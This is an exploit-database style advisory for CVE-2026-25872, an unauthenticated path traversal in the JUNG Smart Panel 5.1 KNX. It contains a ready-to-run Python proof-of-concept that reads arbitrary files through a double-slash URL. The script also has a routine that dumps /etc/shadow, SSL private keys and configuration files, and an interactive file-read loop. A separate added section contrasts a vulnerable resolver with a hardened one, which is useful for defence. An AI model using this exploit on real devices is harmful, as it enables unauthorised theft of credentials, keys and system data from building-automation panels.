| Title | Published | Family (source) |
|---|---|---|
| CVE-2026-25872 | 10 Feb 2026 22:25 | attackerkb |
| JUNG Smart Panel KNX Path Traversal Vulnerability | 10 Feb 2026 00:00 | cnnvd |
| CVE-2026-25872 | 10 Feb 2026 22:25 | cve |
| CVE-2026-25872 JUNG Smart Panel 5.1 KNX Unauthenticated Path Traversal | 10 Feb 2026 22:25 | cvelist |
| CVE-2026-25872 | 10 Feb 2026 23:16 | nvd |
| PT-2026-7476 | 10 Feb 2026 00:00 | ptsecurity |
| CVE-2026-25872 | 12 Feb 2026 01:04 | redhatcve |
| CVE-2026-25872 JUNG Smart Panel 5.1 KNX Unauthenticated Path Traversal | 10 Feb 2026 22:25 | vulnrichment |
| JUNG Smart Panel 5.1 KNX Unauthenticated Absolute File Path Traversal | 10 Feb 2026 00:00 | zeroscience |
=============================================================================================================================================
| # Title : JUNG Smart Panel 5.1 KNX (L1.12.22) - Unauthenticated File Path Traversal |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.3 (64-bit) |
| # Vendor : https://www.jung-group.com/en-DE |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/215430/ & ZSL-2026-5969
[+] Summary : An unauthenticated file path traversal vulnerability has been identified in the JUNG Smart Panel 5.1 KNX, firmware version L1.12.22, developed by ALBRECHT JUNG GMBH & CO. KG.
The flaw allows remote attackers to read arbitrary files from the underlying operating system without authentication. By sending an HTTP request whose path begins with a
second slash followed by an absolute filesystem path (for example //etc/passwd, as in the PoC below), an attacker can retrieve sensitive system files such as configuration files,
credential stores, network settings, and cryptographic material.
[+] Successful exploitation may result in:
Disclosure of system user accounts
Exposure of password hashes
Leakage of SSL private keys
Exposure of application configuration files
Further privilege escalation or lateral movement
The vulnerability does not require valid credentials and can be exploited remotely over HTTP, significantly increasing its impact in exposed environments.
CVE ID: CVE-2026-25872
Affected Version: JUNG Smart Panel 5.1 KNX, firmware L1.12.22
Impact: Confidentiality compromise (arbitrary file read)
Attack Vector: Remote (Unauthenticated), HTTP
Severity: High / Critical (depending on deployment exposure; a panel reachable from an untrusted network is the worst case)
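To show why the double-slash request form used in the PoC reads files outside the web root, here is an added example (not code from the advisory or the JUNG firmware). The `resolve_naive` resolver is a hypothetical reconstruction of the bug class: it strips exactly one leading slash and joins the rest onto the document root, so `//etc/passwd` becomes the absolute path `/etc/passwd`, which `os.path.join` then uses verbatim. `resolve_safe` is the hardened form a practitioner would want: every leading slash removed, NUL rejected, and containment checked after canonicalisation. `WEB_ROOT` and the request paths are constructed for the example.

```python
#!/usr/bin/env python3
"""Absolute-path traversal: naive vs. hardened document-root resolution.

Added example; not code from the JUNG firmware or the advisory. The web root
and request paths are constructed, and resolve_naive is a hypothetical
reconstruction of the bug class rather than the panel's real handler.
"""
import os
from typing import Optional

# Constructed web root for the example (it need not exist on disk).
WEB_ROOT = "/srv/panel/www"


def resolve_naive(root: str, url_path: str) -> str:
    """Hypothetical vulnerable resolver.

    Strips exactly ONE leading "/" and joins the remainder onto root.
    "//etc/passwd" -> "/etc/passwd", and os.path.join discards root
    entirely when the second component is absolute.
    """
    rel = url_path[1:] if url_path.startswith("/") else url_path
    return os.path.normpath(os.path.join(root, rel))


def resolve_safe(root: str, url_path: str) -> Optional[str]:
    """Hardened resolver: absolute path inside root, or None if rejected.

    - rejects NUL bytes (would truncate the path in a C open())
    - strips EVERY leading slash so the joined component is never absolute
    - canonicalises both sides (symlinks, "..") before the containment check
    """
    if "\x00" in url_path:
        return None
    rel = url_path.lstrip("/")
    root_abs = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_abs, rel))
    if os.path.commonpath([root_abs, candidate]) != root_abs:
        return None
    return candidate


def escapes_root(root: str, resolved: str) -> bool:
    """True if a resolved filesystem path lies outside root."""
    root_abs = os.path.realpath(root)
    target = os.path.realpath(resolved)
    return os.path.commonpath([root_abs, target]) != root_abs


if __name__ == "__main__":
    # Constructed request paths: the PoC's "//" form, a legitimate file,
    # a classic dot-dot attempt, and a key file from the PoC's target list.
    requests_seen = (
        "//etc/passwd",
        "/index.html",
        "/../../etc/shadow",
        "//etc/ssl/private/ssl-cert-snakeoil.key",
    )
    for req in requests_seen:
        naive = resolve_naive(WEB_ROOT, req)
        safe = resolve_safe(WEB_ROOT, req)
        print(f"{req:42} naive -> {naive:45} "
              f"escapes={escapes_root(WEB_ROOT, naive)!s:5} safe -> {safe}")
```

The hardened resolver deliberately keeps `//etc/passwd` as a request for `<root>/etc/passwd` rather than rejecting it outright: a 404 inside the root is harmless, whereas any code path that hands an attacker-controlled absolute path to `open()` is not. If the device's HTTP server is a third-party component rather than custom code, the equivalent fix is a vendor firmware update; the check above is the review question to ask of any file-serving handler.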
[+] POC :
```python
#!/usr/bin/env python3
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


class JUNGSmartPanelExploit:
    def __init__(self, target_ip):
        self.target_ip = target_ip
        self.base_url = f"http://{target_ip}"
        self.session = requests.Session()

    def read_file(self, file_path):
        """
        Read arbitrary files from the target system
        Example: /etc/shadow, /etc/passwd, /etc/hostname
        """
        try:
            # The traversal trigger: a second leading slash followed by the
            # absolute path of the file to read, e.g. http://target//etc/passwd
            url = f"{self.base_url}//{file_path.lstrip('/')}"
            response = self.session.get(
                url,
                timeout=10,
                verify=False,
                allow_redirects=False
            )
            if response.status_code == 200 and response.text:
                return response.text
            else:
                return f"[!] Failed to read {file_path} (Status: {response.status_code})"
        except Exception as e:
            return f"[!] Error: {str(e)}"

    def exploit(self):
        """Main exploitation function: confirm the bug with /etc/hostname"""
        print(f"\n[*] Targeting JUNG Smart Panel at {self.target_ip}")
        print("[*] Checking vulnerability...")
        test_file = "/etc/hostname"
        result = self.read_file(test_file)
        if "Failed" not in result and "Error" not in result:
            print("[+] Target is VULNERABLE!")
            print(f"[+] Successfully read {test_file}:")
            print("-" * 50)
            print(result.strip())
            print("-" * 50)
            return True
        else:
            print("[-] Target may not be vulnerable or is unreachable")
            return False

    def dump_sensitive_files(self):
        """Dump common sensitive files (not called from main(); invoke manually)"""
        sensitive_files = [
            "/etc/shadow",
            "/etc/passwd",
            "/etc/hostname",
            "/etc/network/interfaces",
            "/etc/hosts",
            "/proc/version",
            "/proc/cpuinfo",
            "/var/www/html/config.php",
            "/etc/ssl/private/ssl-cert-snakeoil.key"
        ]
        print("\n[*] Dumping sensitive files...")
        for file_path in sensitive_files:
            print(f"\n[>] Reading: {file_path}")
            print("-" * 40)
            content = self.read_file(file_path)
            print(content[:200] + "..." if len(content) > 200 else content)
            print("-" * 40)


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        print(f"Example: {sys.argv[0]} 17.17.17.17")
        sys.exit(1)
    target = sys.argv[1]
    exploit = JUNGSmartPanelExploit(target)
    if exploit.exploit():
        print("\n[*] Interactive mode - Enter file paths to read (or 'quit'):")
        while True:
            file_path = input("\n[?] File path (e.g., /etc/shadow): ").strip()
            if file_path.lower() == 'quit':
                break
            if file_path:
                content = exploit.read_file(file_path)
                print(content)


if __name__ == "__main__":
    print("=" * 60)
    print("JUNG Smart Panel 5.1 KNX File Disclosure Exploit")
    print("ZSL-2026-5969 | CVE-2026-25872")
    print("=" * 60)
    main()
```
====================================================================================
Greetings to : jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)
====================================================================================